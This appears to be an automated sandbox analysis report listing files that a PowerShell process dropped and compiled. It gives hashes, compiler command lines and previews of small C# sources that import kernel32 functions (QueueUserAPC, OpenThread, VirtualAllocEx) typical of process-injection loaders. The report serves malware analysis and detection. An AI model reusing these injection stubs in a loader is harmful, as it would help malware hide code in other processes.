SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f9xfLUzxs7+AEszIwk:xKIR37Lvkmb6KRflxzUWZEiflx4
MD5:	6D17C02E8366A2EF1774DB490C67480C
SHA1:	DC070FD71CE2588CDD0151D7996491BC994BEADE
SHA-256:	1A3C44325F59325073E0B6CB6080F3C1FCDB7FA6B4766C92B90040860872249B
SHA-512:	B55F62307BC1E8BA9E8365EC46381FC8FF62A73EC716FFD8037902184A81DE2EF1D1635A28AF389227FDE8688324B3CEB09B50B6A441DE320CFAB63CA9004B24
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mqjlkxcv\mqjlkxcv.0.cs"......

C:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.106370428661338
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grya2Eak7Ynqqh2JPN5Dlq5J:+RI+ycuZhNhEakSwJPNnqX
MD5:	164D826D3A274A673EB2FE1479242678
SHA1:	6C827764F834C3C1C833EE96F5554EEFE6B2A917
SHA-256:	D4BAF21C386FC8E33DD194A5CF186A20EC2FAB6DB9E002610C51E422098D21D3
SHA-512:	7F35869ECEB639AF540807017E158E78776BF825186166FAACBDF457C7876E9AEE8C0F8E67852DDFD027DA712B90E890E5DDDAB6E3B2F152DDDC1E549E0A4200
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.k.k.m.t.u.z.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.k.k.m.t.u.z.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.006501307614425
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJoAmMRSR7a1t8cJZsvMemaSRa+rVSSRnA/fcrQtpIy:V/DTLDfuTMI8cnsvfmB9rV5nA/UrQtGy
MD5:	346C702AEC55517539C8D92FA4838B3F
SHA1:	03203324DC8F3D2ACBD9F17DD49285C0ABF2421E
SHA-256:	49ABC2E7CEDF7D8D7AFAE5220C611138C68EC1FC57A4732990C88F26A4E49F1E
SHA-512:	997D7567E352337C187863343019026AF340EED6EA0F3DED9C2242965EABF433FC92B978B1518280CD36D162B071287E14A7206F873C83187EA9AC7937084F65
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class wgvgxoi. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr cqpgefru,IntPtr dmcn,IntPtr tmelckxfic);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jralgvk,uint gvvdmo,IntPtr rne);.. }..}.

C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.21022439668988
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23flBl+zxs7+AEszIwkn23flB9:p37Lvkmb6KRftBl+WZEiftB9
MD5:	6FDD56AEAAAF48F2A2B91D84CD0CF864
SHA1:	48BE29B1A7DBA6FB3694A6F8C59DAD7B7FB78246
SHA-256:	8DB74D338D923A8BD33AD5315C3078B2FB208C5181BDC70DF814A165258F8673
SHA-512:	BEC8493A4F3BFE90DF006459512A951ED407A01B05DFB76BF74E224048FD7685878A4304CA2171740AFDFA05E2D8C959232C1E7E0668751C70A8B85FC01AE427
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.0.cs"

C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6075175677080344
Encrypted:	false
SSDEEP:	48:6Mm3r5JS+ilLEbQUJDm9ai1ulhEa3wrq:wb5JSHLsLEKw
MD5:	0751162C45C1F310532E8710DDE7D4A5
SHA1:	7097BEFE63788A79BF0692DF00626BAE10BF60B9
SHA-256:	C20F1EDE12512FE9563FB1F45C2EF3871E96C3B4446DE86F46F793AAC2CB8BF8
SHA-512:	48337DF8C0851F8999A1F9E51B18615CF71C2342E25A4D8F210B6D6B414778B5E28FEED45300F785FBB04C851609515E898C49C5D41BE12135FAB105E2324D92
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'M.`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...................................................... :............ G............ Z.....P ......e.........k.....t.....y.....................e. ...e...!.e.%...e............3.0.....:.......G.......Z.......................................#........<Module>.pkkmtuzt.dll.wgvgxoi.W32.mscorlib.

C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	454
Entropy (8bit):	5.347782043418043
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23flBl+zxs7+AEszIwk9:xKIR37Lvkmb6KRftBl+WZEiftBY
MD5:	D10ACEEDB3CF7B7F33CC2424BF131EF7
SHA1:	9E7BBE32AF9839B10447FB1EFF887C72C2A20490
SHA-256:	D5EFDD043AAD312A17978521F6BFCAD63C92838BF6EFAA9F4876DB9A0E3156D0
SHA-512:	1534002241C9942EAA6CAD6CC5B03C40F27DDF73463D555AA266B35FFEA31E19334B16596DFACF138C2B65D46F7343D82F0039881D817788A6D30700547514BE
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.0.cs"......

C:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0957043611842474
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypl0ak7YnqqilZPN5Dlq5J:+RI+ycuZhN50akSGZPNnqX
MD5:	43D9A659FD9D703470B4F474C7EE4BD3
SHA1:	DE00BD1B013C15A6296392964A1C3E2ABBEE6427
SHA-256:	5FA43530BBB9E520EF008C9AA455D2AFEFD4C5E6C2106377FF4D5776369AA61D
SHA-512:	532DF41493D70DD3AD0A7102ED16521A1CEC179B581A8598FED410132201FD95B1E90B723701BE8229B189C4138AB70181C5D5629662407B574093F939AAF36D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.p.y.o.e.w.2.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.p.y.o.e.w.2.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	412
Entropy (8bit):	4.988997636788378
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJUfmMRSRa+eNMjSSRrpNAx0H9SRHq1usvCDFhZJOqQy:V/DTLDfuV9eg5rpNADuuBfZAqQy
MD5:	FE2480BDBA6D62383E977D1307AB92FE
SHA1:	0EE873C3130667976A2BF6818ED39ADBFC3EED69
SHA-256:	AE285CBEF3EBFC69E6FEF51BA5967FD0FFAA8D8E05AFACABCF8A9604AF5DB4A0
SHA-512:	92740C188F74C23A1D49697C2113D84CAA4FCBD21BF52749ADCE4822CBACA6E1040ECC1E52F21F8A54709851A000A2EF66277C10FE51305417D530BE6761B894
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class gryv. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint smvdgeyph,uint fibsaspe);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr lacbaj,IntPtr pivx,uint tbqhioooo,uint rhbv,uint ebbtbfesjk);.. }..}.

C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.223451152247899
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f8zxs7+AEszIwkn23fL9n:p37Lvkmb6KRf0WZEifx
MD5:	AC16A465E23D679B32FF4C07BBCB0D24
SHA1:	6EE0A4704825D242FCD56B4EE8A088FB519F0046
SHA-256:	A753855EA5B0366611288E68A9A81B7F0885580E15F356E3BBB64985DC3B6FF8
SHA-512:	D1C51309D6B93803556F5A0BD821E5116780912A0CA422159F18C337B5C64CBA472FD3CCEE068F66ADD47D765BF59CF6A558994B42FE9F1C9311BDC822F6C560
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.0.cs"

C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.619461872384734
Encrypted:	false
SSDEEP:	24:etGSbM+WEei8MTHRY+CGTYPdWIZGrIXtkZf63Mw7I+ycuZhN50akSGZPNnq:6J7qMTXC24WvlJ63t1ulWa3Cq
MD5:	E8C27A19F010F02C300B0FF91F8C4115
SHA1:	838DB70BE0FFAD669DD4C8C7D507DA373AFD98BF
SHA-256:	F7C84C5EAB91A355CD9C95AACF842CEB67871CD599E4A3034A766E82217E7EFE
SHA-512:	7FC000155C8AC8429DF85C6F959723D491501D13302F9D8BB193DA9E68FA66082E0F8BE693B82F6549B34E4ABB92FCDFFC820B19F24404138C9AE067D979FA46
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... M.`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...............%...................................... 7............ I............ Q.....P ......`.........f.....p.....y...........................`.!...`...!.`.&...`.......+.....4.8.....7.......I.......Q....................................... ..........<Module>.rpyoew2f.dll.gryv.W32.msco

C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.095932796207496
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycoIVak7Ynqq/oIaPN5Dlq5J:+RI+ycuZhN2fVakS/faPNnqX
MD5:	D14DCB76DD44EBFB3059B599FF742EDE
SHA1:	6DC473E8F4730A20E1B7501BCB473F3BFB925FE1
SHA-256:	A8F193F1EB68620D421DA1395CFA870934A7DD473ADFDBFFC82F7FE541498E36
SHA-512:	D1BA2C245A6CCC7B6323500802A83181BA96CBBF1EBE4303B574FC35D79DB9314A60E6D40A5EE423A76D0831CC865978A92D5849DFB32BBD6D78D5E70FA128D8
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.z.s.l.c.w.3.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.z.s.l.c.w.3.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.006501307614425
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJoAmMRSR7a1t8cJZsvMemaSRa+rVSSRnA/fcrQtpIy:V/DTLDfuTMI8cnsvfmB9rV5nA/UrQtGy
MD5:	346C702AEC55517539C8D92FA4838B3F
SHA1:	03203324DC8F3D2ACBD9F17DD49285C0ABF2421E
SHA-256:	49ABC2E7CEDF7D8D7AFAE5220C611138C68EC1FC57A4732990C88F26A4E49F1E
SHA-512:	997D7567E352337C187863343019026AF340EED6EA0F3DED9C2242965EABF433FC92B978B1518280CD36D162B071287E14A7206F873C83187EA9AC7937084F65
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class wgvgxoi. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr cqpgefru,IntPtr dmcn,IntPtr tmelckxfic);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jralgvk,uint gvvdmo,IntPtr rne);.. }..}.

C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.215608522075782
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fcw+zxs7+AEszIwkn23fcK:p37Lvkmb6KRfkPWZEifkK
MD5:	DBA76A1DF7279CCFF4EF7C73CF00A038
SHA1:	956851567DCEC91D024F0D3F3854441A54E52200
SHA-256:	CC7CC998F042B5BD15104D6910DEA19CF9C9F9D9B8E403FC129E61491107A48B
SHA-512:	76F9B76BBA35C01B9B8B1F5A3EEE09874E863D395C642E8CD0A5453D177E2241A4AEEDEAED02F8C2A1AD4788477ED0DBCD7B430D3EC40167C566A170A413E0C2
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.0.cs"

C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.608109181848051
Encrypted:	false
SSDEEP:	24:etGSU8OmD3lm85JSwViUmHdEAY4HZtkZfmqgVUh0XI+ycuZhN2fVakS/faPNnq:6um3r5JS+ilLXUJmqYai1ul2da3/eq
MD5:	2BF65A551379EA58D7A53A0C74F8B721
SHA1:	ADA631D5C951C972E7F0088971DF33B0E903135D
SHA-256:	2251629B5C4326B9FD65E06F82E9EF28B30276A86DF5567FD387B92626D4450E
SHA-512:	54A8220CA0B85AE88A43718C1840696AB530B57CAE24E4C9C8DC1298E42CCAE597E611A2CC97E3669BA1ACCA06E21130CDB3112D69BB400730ABFB6501254A19
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...................................................... :............ G............ Z.....P ......e.........k.....t.....y.....................e. ...e...!.e.%...e............3.0.....:.......G.......Z.......................................#........<Module>.rzslcw3n.dll.wgvgxoi.W32.mscorlib.

C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.098443871080915
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTQak7Ynqq2VPN5Dlq5J:+RI+ycuZhNhQakS2VPNnqX
MD5:	22390EB1E0F534D9B0F4DC5C8E379976
SHA1:	79C1AAF7573716D6663D3A620AB8E2F654AC6FD0
SHA-256:	A5C5743569F3AE8CE1C507423383143B5B56B5A08E6554170F91E3911554E8C3
SHA-512:	0A69447D113B129F42CA419D3AACCA0D9406A05CF0FBE56D16DB70CDCEDEBE11CB1CE3D56425045F9D49137113C24EE7608BAB606C8368E9A6CF270CBCB9523A
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.w.r.b.q.4.i.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.w.r.b.q.4.i.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.006501307614425
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJoAmMRSR7a1t8cJZsvMemaSRa+rVSSRnA/fcrQtpIy:V/DTLDfuTMI8cnsvfmB9rV5nA/UrQtGy
MD5:	346C702AEC55517539C8D92FA4838B3F
SHA1:	03203324DC8F3D2ACBD9F17DD49285C0ABF2421E
SHA-256:	49ABC2E7CEDF7D8D7AFAE5220C611138C68EC1FC57A4732990C88F26A4E49F1E
SHA-512:	997D7567E352337C187863343019026AF340EED6EA0F3DED9C2242965EABF433FC92B978B1518280CD36D162B071287E14A7206F873C83187EA9AC7937084F65
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class wgvgxoi. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr cqpgefru,IntPtr dmcn,IntPtr tmelckxfic);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jralgvk,uint gvvdmo,IntPtr rne);.. }..}.

C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.271820055959436
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fkzxs7+AEszIwkn23fXx:p37Lvkmb6KRfcWZEif5
MD5:	E515D938CBF891B09D69CA260AAEB79D
SHA1:	60599380534FE12DFABF3D248451AA987E88F5B3
SHA-256:	601FFC5EDDE69F3D577BDA7CA62D1209146A081855159296BA6FD139B0B238DC
SHA-512:	ED91ED40844DB8BED0C8AF47E19B776990287C4C100A7ED8F5EAA3E8151C9F181D1B0FF7693605B72473E2CD780FD917EC08F6308E79723EA1325A54BD40FB61
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.0.cs"

C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.609650813696585
Encrypted:	false
SSDEEP:	24:etGS4e8OmD3lm85JSwViUmHdEARA4HZtkZfIDVUh0XI+ycuZhNhQakS2VPNnq:64Ym3r5JS+ilLxUJIRai1ulya3Wq
MD5:	521478FE3C15F666EBD4FD4803BDCB38
SHA1:	70EBB3916671A95849286F30BF1B4A341C9728E8
SHA-256:	0EBC497463A56D14FC04129236915B73343E34B0BD310960048BE247E13EA9DE
SHA-512:	E8882A39EE0B2697A29215E4445A0EE7A734B3A6A970A95872D6EB26BEC17F5F6E20156B2F5B8D5E52CB52CF66B34B7D0DB975D589AC6E6AA5BE59F329C2BEA8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$M.`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...................................................... :............ G............ Z.....P ......e.........k.....t.....y.....................e. ...e...!.e.%...e............3.0.....:.......G.......Z.......................................#........<Module>.xwrbq4ie.dll.wgvgxoi.W32.mscorlib.

C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
